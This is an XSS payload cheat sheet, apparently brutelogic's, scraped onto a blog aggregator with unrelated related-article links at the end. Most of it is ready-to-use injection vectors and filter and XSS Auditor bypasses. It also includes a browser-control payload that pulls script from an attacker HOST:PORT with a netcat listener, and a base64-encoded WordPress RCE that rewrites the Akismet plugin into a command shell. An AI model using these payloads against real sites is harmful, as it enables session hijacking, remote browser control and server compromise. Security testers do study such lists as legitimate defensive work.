Basic and advanced exploits for XSS proofs and attacks.

Work in progress, bookmark it.

Technique Vector/Payload *
* In URLs: & => %26 , # => %23 , + => %2B
HTML Context 
Tag Injection		 <svg onload=alert(1)>
"><svg onload=alert(1)//
HTML Context 
Inline Injection		 "onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
Javascript Context 
Code Injection		 '-alert(1)-'
'-alert(1)//
Javascript Context 
Code Injection
(escaping the escape)

\'-alert(1)//
Javascript Context 
Tag Injection		 </script><svg onload=alert(1)>
PHP_SELF Injection http://DOMAIN/PAGE.php/"><svg onload=alert(1)>
Without Parenthesis <svg onload=alert`1`>
<svg onload=alert&lpar;1&rpar;>
<svg onload=alert(1&#x29>
<svg onload=alert(1&#41>

Filter Bypass 
Alert Obfuscation

 (alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)

Body Tag

 <body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)

Miscellaneous Vectors

 <marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!

Agnostic Event Handlers

 <x contenteditable onblur=alert(1)>lose focus! 
<x onclick=alert(1)>click this! 
<x oncopy=alert(1)>copy this! 
<x oncontextmenu=alert(1)>right click this! 
<x oncut=alert(1)>copy this! 
<x ondblclick=alert(1)>double click this! 
<x ondrag=alert(1)>drag this! 
<x contenteditable onfocus=alert(1)>focus this! 
<x contenteditable oninput=alert(1)>input here! 
<x contenteditable onkeydown=alert(1)>press any key! 
<x contenteditable onkeypress=alert(1)>press any key! 
<x contenteditable onkeyup=alert(1)>press any key! 
<x onmousedown=alert(1)>click this! 
<x onmousemove=alert(1)>hover this! 
<x onmouseout=alert(1)>hover this! 
<x onmouseover=alert(1)>hover this! 
<x onmouseup=alert(1)>click this! 
<x contenteditable onpaste=alert(1)>paste here!
Code Reuse
Inline Script		 <script>alert(1)// 
<script>alert(1)<!–
Code Reuse 
Regular Script		 <script src=//brutelogic.com.br/1.js> 
<script src=//3334957647/1>

Filter Bypass
Generic Tag + Handler
Encoding  Mixed Case  Spacers 
%3Cx onxxx=1 
<%78 onxxx=1 
<x %6Fnxxx=1 
<x o%6Exxx=1 
<x on%78xx=1 
<x onxxx%3D1		 <X onxxx=1 
<x OnXxx=1 
<X OnXxx=1

Doubling 
<x onxxx=1 onxxx=1

 <x/onxxx=1 
<x%09onxxx=1 
<x%0Aonxxx=1 
<x%0Conxxx=1 
<x%0Donxxx=1 
<x%2Fonxxx=1 
Quotes Stripping Mimetism
<x 1='1'onxxx=1 
<x 1="1"onxxx=1		 <[S]x onx[S]xx=1

[S] = stripped char or string

 <x </onxxx=1 
<x 1=">" onxxx=1 
<http://onxxx%3D1/
Generic Source Breaking <x onxxx=alert(1) 1='
Browser Control <svg onload=setInterval(function(){with(document)body. 
appendChild(createElement('script')).src='//HOST:PORT'},0)>

$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done

Multi Reflection
Double Reflection
Single Input Single Input (script-based)
'onload=alert(1)><svg/1=' '>alert(1)</script><script/1=' 
*/alert(1)</script><script>/*
Triple Reflection
Single Input Single Input (script-based)
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='		 */</script>'>alert(1)/*<script/1='
Multi Input
Double Input Triple Input
p=<svg/1='&q='onload=alert(1)> p=<svg 1='&q='onload='/*&r=*/alert(1)'>

Without Event Handlers

 <script>alert(1)</script> 
<script src=javascript:alert(1)> 
<iframe src=javascript:alert(1)> 
<embed src=javascript:alert(1)> 
<a href=javascript:alert(1)>click 
<math><brute href=javascript:alert(1)>click 
<form action=javascript:alert(1)><input type=submit> 
<isindex action=javascript:alert(1) type=submit value=click> 
<form><button formaction=javascript:alert(1)>click 
<form><input formaction=javascript:alert(1) type=submit value=click> 
<form><input formaction=javascript:alert(1) type=image value=click> 
<form><input formaction=javascript:alert(1) type=image src=SOURCE> 
<isindex formaction=javascript:alert(1) type=submit value=click> 
<object data=javascript:alert(1)> 
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> 
<svg><script xlink:href=data:,alert(1) /> 
<math><brute xlink:href=javascript:alert(1)>click 
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

Mobile Only
Event Handlers
<html ontouchstart=alert(1)> 
<html ontouchend=alert(1)> 
<html ontouchmove=alert(1)> 
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
Javascript
Properties Functions
<svg onload=alert(navigator.connection.type)> 
<svg onload=alert(navigator.battery.level)> 
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)>		 <svg onload=navigator.vibrate(500)> 
<svg onload=navigator.vibrate([500,300,100])>
Generic Self to Regular XSS <iframe src=LOGOUT_URL onload=forms[0].submit()> 
</iframe><form method=post action=LOGIN_URL> 
<input name=USERNAME_PARAMETER_NAME value=USERNAME> 
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>

File Upload

 Injection in Filename
"><img src=1 onerror=alert(1)>.gif

Injection in Metadata
$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg

Injection with SVG File
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

Google Chrome 
Auditor Bypass 
(up to v51)

 <script src="data:&comma;alert(1)// 
"><script src=data:&comma;alert(1)//

<script src="//brutelogic.com.br&sol;1.js&num; 
"><script src=//brutelogic.com.br&sol;1.js&num;

<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 
"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
PHP File for 
XHR Remote Call		 <?php header(“Access-Control-Allow-Origin: *”); ?>
<img src=1 onerror=alert(1)>
Server Log Avoidance <svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1)>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
Shortest PoC <base href=//0>

$ while:; do echo "alert(1)" | nc -lp80; done

Portable Wordpress RCE

 <script/src="data:&comma;eval(atob(location.hash.slice(1)))//&num;
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
Qp4LnNlbmQoJCk=

http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD

NOTICE: A special version of this cheat sheet (with private stuff) is available to@brutalsecrets followers here (check pass on timeline).

#hack2learn

XSS Cheat Sheet的更多相关文章

  1. XSS Cheat Sheet(basics and advanced)

    XSS Cheat Sheet BASICS HTML注入 当输入位于HTML标记的属性值内或标记的外部(下一种情况中描述的标记除外)时使用.如果输入在HTML注释中,则在payload前加上&quo ...

  2. XSS (Cross Site Scripting) Prevention Cheat Sheet(XSS防护检查单)

    本文是 XSS防御检查单的翻译版本 https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sh ...

  3. XSS Filter Evasion Cheat Sheet 中文版

    前言 译者注: 翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常有价值.但是这么著名的一个备忘录却一直没有人把它翻译成中文版.很多人仅仅是简单的把文中的 各种代码复制下来,然后看起来很刁的发在 ...

  4. 转:PostgreSQL Cheat Sheet

    PostgreSQL Cheat Sheet CREATE DATABASE CREATE DATABASE dbName; CREATE TABLE (with auto numbering int ...

  5. Git Cheat Sheet

    Merge Undo git merge with conflicts $ git merge --abort Archive $ git archive --format zip --output ...

  6. CSS3 Animation Cheat Sheet:实用的 CSS3 动画库

    CSS3 Animation Cheat Sheet 是一组预设的动画库,为您的 Web 项目添加各种很炫的动画.所有你需要做的是添加样式表到你的网站,为你想要添加动画效果的元素应用预制的 CSS 类 ...

  7. IOS Application Security Testing Cheat Sheet

    IOS Application Security Testing Cheat Sheet    [hide]  1 DRAFT CHEAT SHEET - WORK IN PROGRESS 2 Int ...

  8. HTML5 Cheat sheet PNG帮助手册(标签、事件、兼容)

    HTML5 Cheat sheet PNG帮助手册(标签.事件.兼容) 1.HTML5标签 2.HTML5事件 3.HTML5兼容 最新HTML5手册资料请参考:http://www.inmotion ...

  9. [转]Swift Cheat Sheet

    原文:http://kpbp.github.io/swiftcheatsheet/ A quick cheat sheet and reference guide for Apple's Swift ...

随机推荐

  1. Cannot destructure property `createHash` of 'undefined' or 'null'(next服务端渲染引入next-less错误).

    next中引入@zeit/next-less因next版本过低(webpack4之前的版本)无法执行next-less内置的mini-css-extract-plugin mini-css-extra ...

  2. Python2_实现文件中特定内容的获取

    ===================================================== 参考链接 Python 文本文件内容批量抽取:https://blog.csdn.net/q ...

  3. spring MVC 核心配置

    <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.spr ...

  4. 前端vue——阿里图标的使用方法

    阿里图标库的官方网址:https://www.iconfont.cn/ 使用前需要先登录,这里有三种登录方式,本人使用的是新浪微博登录 第一步:找到你需要的图标,点击添加入库 第二步:点击右上角的购物 ...

  5. SQLAlchemy的增删改查 一对多 多对多

    Models只是配置和使用比较简单,因为是Django自带的ORM框架,所以兼容性不行,所以出现了SQLAlchemy,SQLAlchemy是比较全面的ORM框架,它可以在任何使用SQL查询时使用 以 ...

  6. 《HelloGitHub》第 45 期

    兴趣是最好的老师,HelloGitHub 就是帮你找到兴趣! 简介 分享 GitHub 上有趣.入门级的开源项目. 这是一个面向编程新手.热爱编程.对开源社区感兴趣 人群的月刊,月刊的内容包括:各种编 ...

  7. 看完知乎上500条答案,我为大家整理了这21个B站学习类UP主

    原文之前发在我的知乎,转载请注明出处. ​ 虽然,今天算法文章还没更新┏(゜ロ゜;)┛,但还是溜过来跑个题~ 之前看到了博客上有小伙伴在分享自己的B站资源,才突然意识到自己其实也积攒了很多优秀UP的资 ...

  8. windows 服务的安装、启动、状态查询、停止操作c++实现

    具体的自己看看代码 粘贴复制即可使用 卸载也很简单自己查看MSDN 加上就是 #ifndef __SERVICEMANAGE_H__ #define __SERVICEMANAGE_H__ #incl ...

  9. 【简要题解】Hihocoder 重复旋律1-9简要题解

    [简要题解]Hihocoder 重复旋律1-8简要题解 编号 名称标签 难度 1403 后缀数组一·重复旋律 Lv.4 1407 后缀数组二·重复旋律2 Lv.4 1415 后缀数组三·重复旋律3 L ...

  10. Java中日期格式化YYYY-DD的坑

    写这篇博文是记录下跨年的bug.去年隔壁组的小伙伴就是计算两个日期之间间隔的天数,因为跨年的原因计算有误. 当时测试组的小姐姐也没有模拟出来这种场景,导致上生产环境直接影响线上的数据. 今天逛技术论论 ...